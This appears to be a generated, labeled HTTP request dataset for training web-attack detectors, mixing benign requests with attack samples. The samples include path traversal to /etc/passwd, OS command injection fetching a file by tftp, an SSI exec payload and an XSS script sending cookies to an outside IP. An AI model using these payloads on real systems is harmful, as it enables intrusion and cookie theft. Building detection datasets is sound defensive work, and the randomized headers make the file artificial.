If-Match: "_5UsmAaZ-zL7HXHKm"
If-None-Match: "1FnLbfKVJAKhNR7cl3cs"
If-Range: "kuBXRQ9HVuEQVHMfK"
Max-Forwards: 287
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest username="tnelie"
Authorization: NTLM ZWg4ZFRwU2ppdDZ3NGVkcmhhdHRpZVJiN2F0dGVoN2hmZGx0ZW5mZmV0dA==
Range: -630,9-,363-
Referer: /aeeob8.aspx
TE: trailers,deflate,deflate
Trailer: If-Unmodified-Since
User-Agent: A2hOEb3eWiaotouan
UA-CPU: 68000
UA-Disp: 3222,4414,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 132x8371
Via: 9.5 102.134.89.126:042, FTP/0.1 237.203.65.40
Transfer-Encoding: deflate
Upgrade: tnsap/4.9, hb3i/7.3, teoa/7.0, yetn/8.3, dof/3.7
Warning: 734 www.a4hol.gif "8eiyls3tra8i3ro" "Sun, 10 Sep 06 06:04:47 CET"
X-Forwarded-For: 157.1.233.188
X-Serial-Number: 6066558353005235
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15833
Start - Id: 46100
class: PathTransversal
PUT /4Yb9Xb-ri/qX7rKLHPC6alCI_xs.H.mdb? HTTP/1.0
Content-Length: 327
Content-Language: qhr5e,1ecWe
Content-Encoding: gzip
Content-Location: /jotuedk.wav
Content-MD5: M3R1bjhsc3J4cHJzaGRDbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Jun 04 21:16:39 CET
Last-Modified: Wed, 19 Mar 08 13:26:42 UTC
Host: www.stoaWv.fr
Connection: keep-alive
Accept: application/*;q=0.2
Accept-Charset: x-mac-japanese;q=0.7, x-mac-greek, cp-936, windows-874, iso-8859-9;q=0.3
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 245.20.88.13
Cookie: ef=44;raoorsjuiesyEin=tUdol Eooorm;oobrroe82oeeth8=ysb|;Stmp4_grDYFV=aetRc8feshi;w.nL=t
Cookie2: $Version="0"
Date: Mon, 24 Jul 06 15:27:44 CET
ETag: W/"Lp6NyFktXxgyhfAqmG0"
Expect: 1riwi
If-Modified-Since: Sat, 13 Dec 08 17:53:18 GMT
If-Unmodified-Since: Fri, 23 Oct 09 10:00:17 CET
If-Match: "S2LD5KUML2M384N@i"
If-None-Match: "te@y2_BZ2@wqypf"
If-Range: *
Max-Forwards: 495
MIME-Version: 0.9
Pragma: tanio8a='taiEw'
Proxy-Authorization: NTLM N3lkaXZoNXRmcmFuaG9sYWRuYWlkbm90YW9lZHBqZUlob0F5ZU5h
Authorization: NTLM YXBzZWlhN29nMmVzbWZyaVRvaWxtZUFob3l0SW5zckNuTVRvNnhFc3R0
Range: 43-
Referer: /efcl56/f9tnot.msf
TE: gzip;q=0.4
Trailer: Trailer
User-Agent: Mozilla/6.6 (Machintosh; U; PPC Mac OS X 6.3; 1s-pE; rv:9.9.7) Gecko/67606787
UA-CPU: x86
UA-Disp: 013,8329,8
UA-Color: color32
UA-Pixels: 1090x096
Via: FTP/7.0 www.ag4QOTl.png, 5.5 185.111.24.26, eennh/5.7 185.15.65.49
Transfer-Encoding: gzip
Upgrade: vecj/8.8, yebd/9.0, jn0/6.9, OasdIr/4.2
Warning: 952 www.hhNewo.css "1l2t" "Sun, 16 Oct 05 14:27:34 CET"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wI4J@7selectusoe=8&OcsmLoandi=0 e-t&tcdsbbRD8t=7rmehiu=&1GZJunion76X=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html&nzNil33rhdc6=rsn-/I3eh&sE1zlir5nmmtc=O'ua]mnno0ti t&gztH06o=L+esmh&q8qsystemsEqf=e\&kjK9binPws=5]xterm&eTees=0TWK@guqt

End - Id: 46100
Start - Id: 44624
class: OsCommanding
GET /mks1Vl9D0/hXTeB3iV/l_DfsYUBY.tiff?A5he=ymx%40-0zVmh&S5q8position9mLuGi=29&oreriy9in9le9T=152.239.112.239+%7C+tftp+192.168.10.33+evil.txt HTTP/1.1
Host: www.ecsnSnHi0R.it
Connection: close
Accept: image/gif;q=0.0, image/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: vMIstsa-im4bso, aR8dh9-astea, gy0-yoe3wrsp;q=0.3, es-ua;q=0.3, o-eN;q=0.4
Cache-Control: no-store
Date: Thu, 03 Nov 05 07:41:44 UTC
Max-Forwards: 51
Authorization: ahmht tcowie=sjrtrsc
Referer: http://www.somr.gov/nawl1n/p8woyty/qoaeoI.jpeg
User-Agent: tgj_.hspoc http://www.9sou0ta2.fr
Via: FTP/9.7 www.Ta0H.html, 1e9/0.4 www.lehhi.shtml

null

End - Id: 44624
Start - Id: 26670
class: Valid
GET /VrTSPx3UU/oEiamhtwisincr/_8PNKAahHu.php4?ljetacntSktlcTm=rE5&outetat=697805&astl6eraahe=nqlym&edcjCno7Nvo=ehespVt2aamtal&80z8rn7=86406338&tors9eodNdraf=ibeeeNzT HTTP/1.0
Host: www.aa4cwhb.st:068
Connection: close
Accept: video/*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 83.84.179.173
Cookie: ebs0tnqatt=ioWincludeNct;Thome7k@QF7IKd=sasg ew]wp-;nrbQyanieen=65608671;enoiao3tneEcnu=n>cPal
Cookie2: $Version="931"
Date: Tue, 07 Feb 06 01:38:15 UTC
ETag: W/"DO-RaDm5BCAeq@Crb6qk"
Expect: eetKr7E
From: aenrotes@hoereselr.be
If-Modified-Since: Sun, 01 May 05 10:33:25 UTC
If-Unmodified-Since: Mon, 30 Jun 08 04:49:21 UTC
If-Match: *
If-None-Match: "i80nTMsuAxDy9KG"
If-Range: Sun, 17 Sep 06 06:49:06 CET
Max-Forwards: 3425
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest response="24ebD5f3BCcCec4f689DAfd20DcADAf6"
Authorization: Basic eWFlaTpjbWVh
Range: -484069,7417-956,-660654
Referer: http://www.ew4sH.org/oarncv.php4
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Mozilla/1.8 (X11; U; Linux i586 8.1; di-ih; rv:9.1.7) Gecko/22973054
UA-CPU: PowerPC
UA-Disp: 0736,120,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 190x433
Via: 6.4 www.yiryPli.png
Transfer-Encoding: identity
Upgrade: dss/7.0, hee/2.6, eu9/8.4, uieiTe/9.3, ynTjo4/4.2
Warning: 647 www.73orh.js "6zehdei0repaoct" "Sun, 20 Nov 05 12:22:26 GMT"
X-Forwarded-For: 219.199.45.244
X-Serial-Number: 85340916492
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26670
Start - Id: 22905
class: Valid
GET /thqziE.jsp?hU0FqWrOgKu=i0qG0&vpoumaE=2227&6guvahcT0oitr=e+n7z&icnenretcht5e=schttpsa&orv8oeEaj=hK8f&adhbHnoao0trdgL=7042559061&truia2tuhAnhs=ondhez3nzEv3sE&o9fechomPobject5DUe=6b2xVC6av&noIikttt=623&uAHsrarhaw=01n5nrys9gieat&Eno5tat=oe&i2nap=thmuoAeeh0jnruo&ladnagrro=nasAahK4rlh&cso2e=94262&six3tLrcoa=tsapoTeo HTTP/1.0
Host: www.tnoroseoEe.uk
Connection: lvolN
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: aakxe-nlenihu;q=0.6
Cache-Control: okethp='oin4d5'
Client-ip: 238.41.42.217
Cookie: o5weseeo7n=3678064225;gagyitos=ct2ratWs;pkdrcrtss=hxaxg
Cookie2: $Version="700"
Date: Sat, 22 Sep 07 24:59:11 GMT
ETag: "vqarwC2dO-izWdxNr"
Expect: 100-continue
From: i3tdns@Gdxetisea.uk
If-Modified-Since: Fri, 21 Dec 07 14:25:13 CET
If-Unmodified-Since: Tue, 30 Dec 08 07:26:48 CET
If-Match: "EfY45aO6poCDhibFwj"
If-None-Match: "Vkuiio6tkCyavZgCk0t"
If-Range: Fri, 29 Sep 06 18:05:34 UTC
Max-Forwards: 5
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest response="D5eE089E6EEFdcB7A2271Cf2fC0Fc032"
Authorization: Basic YnBhZzpjYXd2ZQ==
Range: -6039,4724-
Referer: http://mHgeeR.gov/ngudaA/ywtos/kctd.nsf
TE: deflate;q=0.6,gzip,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.9 (compatible; MSIE 9.4; Mac OS X; rcye; cfrllR; rvbesxachn)
UA-CPU: x86
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 301x6303
Via: 3.7 www.xaxmsy4.jpeg, 5.6 www.TuizlTn.htm
Transfer-Encoding: compress
Upgrade: oua/3.4, otefro/7.9, jrsm/7.4, wttl2/5.4
Warning: 383 www.enRF.jpeg "I3teed" 
X-Forwarded-For: 187.231.88.125
X-Serial-Number: 426023548
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22905
Start - Id: 40170
class: SSI
GET /5OIdG/0positionjmG/Th6aTlaiheXeaeort/cnrrterohxitdtwaThr.jpg?XNOP_DHREae=%3C%21+++++%23%3C%21--+++++%23exec++++cmd%3D%22id%22--%3E&8chlahuaeae6=49. HTTP/1.1
Host: www.3eyafeaeoc.de
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312, us-ascii, euc-cn, euc-cn;q=0.1, us-ascii
Accept-Encoding: *
Accept-Language: ujlrxe-me
Cache-Control: no-cache
Client-ip: 34.79.0.86
Cookie: VIItzQJqgroup byphplT=s.K.R;max=ft;lku1=m+ae;n5it4cgimtb=569
Cookie2: $Version="360"
Date: Sat, 26 Feb 05 24:16:07 GMT
ETag: W/"k_aCPWy5XqeILlOdj5S"
Expect: GH1D
From: stce@ygsk.st
If-Modified-Since: Mon, 21 Aug 06 19:18:03 UTC
If-Unmodified-Since: Sun, 26 Aug 07 08:12:42 GMT
If-Match: *
If-None-Match: "PkjiZ_JK4GmOjIG"
If-Range: Thu, 01 May 08 03:35:29 CET
Max-Forwards: 1975
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic cGNuY3Njczplbm9ybTQ=
Authorization: tsnral ysei=dtieashn
Range: 85-
Referer: http://www.wrbO.de/npOA/Eie58y/9Emk/hleu/rosw.jpeg
TE: trailers
Trailer: Warning
User-Agent: dH3sbT http://www.lYme.com
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 427x7361
Via: HTTP/6.4 www.Apteyo.shtml:8454, 0.1 123.32.61.184
Transfer-Encoding: a4ge; thpeg=5untis6n
Upgrade: jil/6.4, nmatei/2.7, 8mb/9.3, iejhA/3.6
Warning: 170 76.199.57.65 "sisbajy1tp1snjc" "Wed, 26 Aug 09 22:46:27 CET"
X-Forwarded-For: 237.110.243.93
X-Serial-Number: 06191135820
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40170
Start - Id: 11911
class: Valid
GET /lMs40/rFOSVgn/eRDQWd.F/lo.css? HTTP/1.1
Host: 34.75.128.3
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: 14='o6rqpnr'
Client-ip: 141.7.159.107
Cookie: ehwNsr=eeM;thifNc=etiangnretniCpjeb;stccx6pdmztbnaE=n0ec54ahnsaan;ecIarmplasl2hnH=wbrggroup byet3eiBntidewHnc;sS7dtinoeo=thw;netasl7=oHieexeclae&zeuoa5g
Cookie2: $Version="5"
Date: Fri, 17 Nov 06 15:23:05 CET
ETag: W/"4saF9.9hmMo9EAgcIyZa"
Expect: 6qr0=i4aoht
From: ewxen@neqnu.ch
If-Modified-Since: Sun, 24 Feb 08 12:13:56 GMT
If-Unmodified-Since: Mon, 27 Dec 04 21:25:14 GMT
If-Match: "oLok_eVVP4yz8tP96PF"
If-None-Match: "@v6jb3_MoMdQa6iaCtZ"
If-Range: Sun, 11 May 08 21:23:14 UTC
Max-Forwards: 4222
MIME-Version: 7.3
Pragma: eb='t2dg'
Proxy-Authorization: Digest opaque="ehheia"
Authorization: toro mrSeeeE=qg7awnt
Range: 91-,70-
Referer: http://uy5detqm.ch/urll4nww/trpedd14/9vartzWf/rrbpyEio/ubsEdre.cfm
TE: chunked,trailers
Trailer: Upgrade
User-Agent: Mozilla/1.0 (X11; U; Unix 4.3; IT-gi; rv:2.9.5) Gecko/14508228
UA-CPU: x86
UA-Disp: 566,0698,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5682x182
Via: 0.2 www.lf1jgv.css:712
Transfer-Encoding: identity
Upgrade: heosIt/7.3, ahu/7.4, meusj/3.1, anau/6.1
Warning: 289 www.Irbdorr.jpeg "eeerr0uart" "Fri, 11 Mar 05 10:40:23 GMT"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11911
Start - Id: 21807
class: Valid
GET /ZtMMZN_.KhC/e5BQY.Yts_n/izL_h8.t/.OYyViyRSnx/NDWr@GX/2FNposition_rn.asp?hoEcyio6m=ehn%3Ee%7C+P%25mperlowKig&iqe6fgK=%40&lrhar6y=00 HTTP/1.0
Host: www.uenleao.com
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: hTat-e, eene-0ur, hToaU55-nzdht6o
Cache-Control: no-store
Client-ip: 14.230.77.185
Cookie: dl=aIm_fG8ta
Cookie2: $Version="4"
Date: Fri, 09 Oct 09 15:10:06 UTC
ETag: W/"h2ZOQ8GkeMdfl7Omwh"
Expect: 100-continue
From: qn7fi@stAorh.org
If-Modified-Since: Tue, 28 Nov 06 03:07:01 UTC
If-Unmodified-Since: Fri, 24 Aug 07 04:39:37 CET
If-Match: "G8GhglZlq395IVA7M"
If-None-Match: *
If-Range: "gk4wh8fcxwRRJU6RCO3a"
Max-Forwards: 9
MIME-Version: 6.6
Pragma: hio9gsie='haOnn'
Proxy-Authorization: NTLM cXJlYXNDbkE2enhlbW40aHI0emdld2hlb296aWU3bm4=
Authorization: 1hea0s HicCssn=rire
Range: 836-,-46
Referer: http://hoRqwi.cz/ohhrci/vsWRiY.tar.gz
TE: chunked
Trailer: Max-Forwards
User-Agent: dpbwmmEmsawbhennnn6h
UA-CPU: StrongARM
UA-Disp: 488,0035,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5280x218
Via: 0.8 11.126.27.101
Transfer-Encoding: identity
Upgrade: eAsu/5.0, gdb/6.1
Warning: 281 www.mehu.png:9321 "ryoermnI0lwry" "Sun, 27 Nov 05 22:05:35 CET"
X-Forwarded-For: 32.5.142.115
X-Serial-Number: 8436166703567420278
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21807
Start - Id: 33585
class: Valid
PUT /ta1J/binLrTHlHPb4sVa7a2k/Esaertootirg7oeblCl/euLiwuelnp9lh/utstoPY/d_hcSCgY/tSUaZ.pP/slr0s-gOI1Laj6uh/eeanLfyi/2UV4nrlk1TDRVqhc/nHWiypV-Zx/dK@Ahi3.swf? HTTP/1.1
Content-Length: 126
Content-Language: ec
Content-Encoding: deflate
Content-Location: http://3CgAoez.be/aiaajjm/tcha.jsp
Content-MD5: cmlvZWl6MXRjYWRnZWJoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Nov 06 01:21:02 GMT
Last-Modified: Mon, 21 Apr 08 18:55:00 CET
Host: 54.18.23.208
Connection: keep-alive
Accept: application/*;q=0.0, application/*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: ra=esug
Client-ip: 17.174.176.26
Cookie: tRhQw=evmOM.yYCtN;json9s=74803;rhavinghttpo=411;access_logP.1R.SP=sda5 l?nl0dpwhp[aR;y3wwevyrhersems=nx@Y_bB;9ivtO65=aJ4fopHtXzf
Cookie2: $Version="998"
Date: Wed, 26 Jan 05 08:24:56 UTC
ETag: W/"QI_U8iQ-IBKYytc1"
Expect: 100-continue
From: HEilye@Ehze.com
If-Modified-Since: Mon, 28 Jun 04 13:05:19 CET
If-Unmodified-Since: Fri, 28 Mar 08 05:06:08 GMT
If-Match: "DPuVbWNaKU_5rNZ"
If-None-Match: "aeMy6mbTTvl37aDw"
If-Range: *
Max-Forwards: 479
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM eHM2c3V5RXVTb29yZG9pZHVkb21lZmFoZXNsYTJhc3J6bg==
Range: -46551,-703321,6844-
Referer: /s3d0blue.doc
TE: trailers,trailers
Trailer: Via
User-Agent: voe3ernnnYNng0tsoN
UA-CPU: x86
UA-Disp: 4987,665,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 578x0874
Via: rtfAn/9.2 www.aSaeugrg.gif
Transfer-Encoding: deflate
Upgrade: ire/8.1, eahte/4.5, eos/9.6, rle/1.8
Warning: 661 www.ngtao.tiff "ezebae8kput" 
X-Forwarded-For: 156.122.130.190
X-Serial-Number: 410317302
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

TusrDxjebE=2352711&3oAcfsrnevtyom=syxTTqEnTzC&d8hpia4nr9St=oq0ID@3.2e4Z&Qdt=  l0u&gmee=tstN&md6=621332&tOixehrintmo==im&

End - Id: 33585
Start - Id: 25103
class: Valid
GET /Gndn.asp?CghoNunda4ge=%25oe14Ohwinntae&eana9=54244&ieamj=ptzseirhw99&s1lfo=eetmail%3Er8v-1esc+lincludec%40&m5dinnC3ueEE=tbee6r%7Cded&dSaeWjedHrjzca=erfsi4swicr7wa HTTP/1.0
Host: 129.218.21.115:67
Connection: ur16
Accept: image/jpeg, application/*
Accept-Charset: x-mac-arabic, windows-1250;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=327
Client-ip: 57.194.145.165
Cookie: C_O1ArAX9J=TtseoohdEltmrnbad;nnhwc=b
Cookie2: $Version="80"
Date: Mon, 23 Jun 08 20:27:15 GMT
ETag: W/"mqQR6ynwj3E7ZmWp"
Expect: qvven
From: hixb@siilehs.org
If-Modified-Since: Thu, 20 Jul 06 12:08:42 GMT
If-Unmodified-Since: Sat, 21 Mar 09 02:52:07 GMT
If-Match: *
If-None-Match: "t6q-xFXL1zF5XkW@18dx"
If-Range: "ABJmIA384KJays8"
Max-Forwards: 8117
MIME-Version: 8.4
Pragma: elxr='1'
Proxy-Authorization: Basic aWdycTA6YXRpYWFpbw==
Authorization: Basic YWFvOXVTbnM6Zml0b2Vl
Range: 07094-
Referer: /tzeep/rnuo/etnl9d.mp3
TE: deflate,trailers
Trailer: Expect
User-Agent: Mozilla/1.7 (Windows; U; Win98 9.5; hd-hE; rv:3.1.9) Gecko/90425652
UA-CPU: PowerPC
UA-Disp: 0466,0106,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 350x680
Via: 5.2 9.164.91.32, FTP/6.3 www.AoinnDa.shtml
Transfer-Encoding: identity
Upgrade: yg2S1h/0.5, 6io/2.3, dsn/3.4
Warning: 317 140.218.52.117:92561 "mh5erupnothHa4i6ik" 
X-Forwarded-For: 64.157.250.51
X-Serial-Number: 714579
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25103
Start - Id: 2316
class: Valid
GET /81Q8Si6xxde2ocw/tyghLpf53N4T/faPlHxmlTCz/ag71.aspx?rv9g=e8fhewtlAn HTTP/1.1
Host: 13.239.163.229
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rEs-A5Qoani, eyc-shn, E-ne, nDs-e8kea, o-ot0u
Cache-Control: max-age=6240
Client-ip: 0.28.13.102
Cookie: bR=autoexec;Tpsd1_FbM3uKf=z7Ur:utixt:snalldiic0;cnshi0ov=99909377;sl6=7668060
Cookie2: $Version="080"
Date: Tue, 27 Apr 10 09:17:35 UTC
ETag: "ljM7lWvWoTYG4Fvoqy"
Expect: 100-continue
From: ihre@EbpA8o.be
If-Modified-Since: Tue, 10 Jul 07 20:27:49 UTC
If-Unmodified-Since: Sat, 13 Jan 07 19:28:23 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 06 Jul 06 16:54:36 CET
Max-Forwards: 4219
MIME-Version: 3.3
Pragma: eemaor='hTan'
Proxy-Authorization: NTLM dGNhMkhhRWU2bHNhaGF5d29ob2VvdWx0d2Vpc2Fjc2dpdDN0aXRvY25pd0g=
Authorization: NTLM Z3RpaHJpUnRhYTAyYWFldG5jbXRsYnROc3Rlb21maGxhZ2xuaWFsbG10c2FzZA==
Range: -79
Referer: http://ghbp.uk/l8tnm/etntdNtA/Eoatof/trratse/htuE5.rar
TE: trailers,deflate
Trailer: TE
User-Agent: eturE/0.0.6.2
UA-CPU: MIPS
UA-Disp: 359,305,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6264x742
Via: 5.6 www.utceesc.htm
Transfer-Encoding: identity
Upgrade: stlths/7.3, teu/6.6, sll/3.7
Warning: 586 www.inoRe.js "oeml9nhheLlz" "Sat, 06 Oct 07 24:28:15 CET"
X-Forwarded-For: 250.186.179.59
X-Serial-Number: 61486796053346804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2316
Start - Id: 47657
class: XSS
GET /v7RlikeF8FiyTvar/a9aFH/sefeaien/leh87porel2a/t5alwmv6eeo/io0ohsda.gif?SllvlsOD=w%3F%2Fi&Oreyhe=dmogtusrurts6y&8otI=%3C%21--+--+--%3E%3Cscript++%3E%5Bwindow.open%28%27http%3A%2F%2F170.29.160.170%2Fnt.swf%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E%3C%21--+--+--%3E&oeedtm9eTtu=dehltmec72&abMy=oSNrazhjxa&n1tahay7r5laac=6617713&I2Ig_phpk-3=3610584905&xsJLjSy@YZgG=5ZKXb4&bcsP=3&ba94tEiEx=en&nsamhidechoMANQ-=cTkFMX&t8gc=wEcaemdd HTTP/1.1
Host: www.aclhas.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: heueoe-seXckeO;q=0.5, eaimyon-o;q=0.8, alm-ndiae, phsfegi-n;q=0.5, ZS-abopeq;q=0.3
Cache-Control: max-age=9
Client-ip: 56.155.32.167
Cookie: swes=lsu
Cookie2: $Version="439"
Date: Mon, 03 May 04 20:41:41 UTC
ETag: W/"T6GZychf4Xyzvl1pm"
Expect: varybo=Gdejuu9m;vcuie=deknnr
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Mon, 02 Feb 04 24:26:39 CET
If-Unmodified-Since: Mon, 27 Jun 05 19:17:00 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 7.7
Pragma: e=dteai
Proxy-Authorization: bxdtp1 pwtsrI=RoiSgk
Authorization: om3tn rEsm=iclaTad
Range: 51-,059585-
Referer: /gwris8/eibnrl/rese1as/xtlmDqm/n1wmt.mp3
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: From
User-Agent: Mozilla/2.1 (Windows; U; Win98 9.8; be-se; rv:1.5.0) Gecko/06784504
UA-CPU: x86
UA-Disp: 434,760,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 101x052
Via: 4.9 23.1.222.104
Transfer-Encoding: es9es
Upgrade: lica5r/6.9
Warning: 452 www.Iau7Ie.jpeg "2HekEIt" "Sat, 30 Apr 05 16:23:39 UTC"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47657
Start - Id: 15980
class: Valid
GET /sdor2/rde0ealwlsmoa9ptde1/dA0P8_mEx.gif?t8uradetp=RaatXMhu1eAettsey&tcsceyiiSrte=b7VTRTl&hM=atldf7aA1eaeA8iau6&Iop9v=https%40&ol8n=4251525&MAmeeneFeieel=unionTryt%26qz&e7toom=geOs&emseetms2asgS=p&n5om=cWQ_JIuh&NK8Q0a=143&irrssrejeeCm=ras%244c3SE%7Eformetx&drrNgie=257&asd4tdtifdwmn=ge6hon HTTP/1.0
Host: 118.101.140.219
Connection: close
Accept: audio/basic;q=0.0, text/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, gzip, deflate;q=0.6
Accept-Language: *;q=0.5
Cache-Control: min-fresh=70531
Client-ip: 31.122.98.168
Cookie: YVscopt=d7B;6eaGeutotleea=o7kwzh
Cookie2: $Version="35"
Date: Thu, 08 May 08 07:19:35 UTC
ETag: ".Bv@UTeq1ecGMZfx"
Expect: iaaznme
From: a2ehh@xsait.it
If-Modified-Since: Wed, 04 Jul 07 23:35:13 UTC
If-Unmodified-Since: Fri, 26 Mar 04 06:20:08 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 29 Dec 08 08:10:57 GMT
Max-Forwards: 9
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM bkRwaHVlU3VvYXV4dWhuaHRvOHRhcmdTb3hoY2VuaWVuc2E=
Authorization: NTLM bXNycnM3bHd0b2hubmFuZXlGajM0T2duTGUyOHRjYXlvaXJmZGVaSXRxZGZ6dWJh
Range: 08-06,-75180
Referer: http://hxekPns.fr/ngaFes/notSe4lf.php4
TE: chunked;q=0.8,chunked;q=0.5,chunked
Trailer: User-Agent
User-Agent: Mozilla/4.1 (X11; U; Open BSD i386 5.6; si-ev; rv:9.7.7) Gecko/18341052
UA-CPU: x86
UA-Disp: 956,2189,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1814x7324
Via: FTP/3.5 www.inhEs.htm
Transfer-Encoding: identity
Upgrade: di6ty/0.9, I5w/8.3
Warning: 177 www.E8otcw.gif "fkekM9nl" "Wed, 27 Apr 05 12:41:49 GMT"
X-Forwarded-For: 18.38.33.49
X-Serial-Number: 606819653
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15980
Start - Id: 42863
class: OsCommanding
GET /oc4tvrPrzYjkXIGHkP/vOAnl4aqUO.jpg?wQNlikesyWFtmpjh=li+9crizehrmhvr%25umtifexec&wXh259=48.177.74.127++++%7Cdir&ir9=c1w&bTethgdossk=528327&SfiftMe8ne=vare1hg1kqnaeheh&tsstor=ode1d3ttifiwcn&Eev=5&aner=308&tnowatppsQmhswt=1428&eea=etlTm&ma=okE%40k&w60zv=4ab8aisi3yHb&aehgtne2taes=yrEmgt%5DaiOwinnt&3ablepota4rrr=142495&adeisauoa5=85232 HTTP/1.1
Host: 21.56.225.143:50
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.5, windows-1255;q=0.6
Accept-Encoding: *
Accept-Language: Nct10lov-usmroo8
Cache-Control: mEjirm=oehl
Client-ip: 4.100.41.101
Cookie: 8EX0E3kT=wUdndgihiseimainss;ueliwdn=61;etEn=wioerrditaedaofsrf;l4orqh=iqmbyV3Rx
Cookie2: $Version="08"
Date: Fri, 29 Aug 08 09:37:44 UTC
ETag: W/"2uen9B8kkt8qjQvH"
Expect: ecdm
From: l6tz5hd@ruglhe.be
If-Modified-Since: Thu, 14 Feb 08 20:19:34 UTC
If-Unmodified-Since: Thu, 10 Aug 06 13:01:04 GMT
If-Match: *
If-None-Match: "dWptwQDyW2XvzD5oKKc7"
If-Range: Mon, 14 Nov 05 17:51:49 CET
Max-Forwards: 96
MIME-Version: 0.9
Pragma: oasrmknb='o45js'
Proxy-Authorization: Basic YXNmZDp0bW84dHo=
Authorization: Basic Y3J0aGQ6bmR0amli
Range: -64,-955
Referer: http://ueglten.it/klIesu3x/itsoqrtn/TAosowe/einhni/0sepmynm.sh
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.8 (X11; U; Unix 9.0; ts-rt; rv:8.1.0) Gecko/62835012
UA-CPU: x86
UA-Disp: 0286,0560,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 625x3364
Via: HTTP/7.7 www.erkth.tiff, 5.4 www.monrr.css, FTP/7.5 148.61.28.128
Transfer-Encoding: compress
Upgrade: gds/3.0, ehewef/0.6, eator/3.4, mwnet/5.2, hnta/0.2
Warning: 323 162.27.151.212 "63fpil54l" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42863
Start - Id: 22524
class: Valid
GET /rgFnph-TOOB-30a2/iiiraorahtePl/d5i5Ht9pkcek6s/o5e8vNyAmxo0/nmcRAlAktelnetk/x.g6J2EKj3telnet9bDQ.aspx?nnieeand8knaat=sncedifdeidn%40&ei82tuth2r5r=mqgr&niTRau4=n%27%3A%7CjDlPr%29t%3Fn&snar=929&7p5mieErayna=e5mieese&H-8lKnodeT_@=Abe&ckfaZcAq=sat6itcoss8gzessnt&taerooafvarae=zosg6&6nJu=%3Dklzl&aa2andfromi=39196&cnizedeHA=d HTTP/1.0
Host: 38.83.15.116
Connection: close
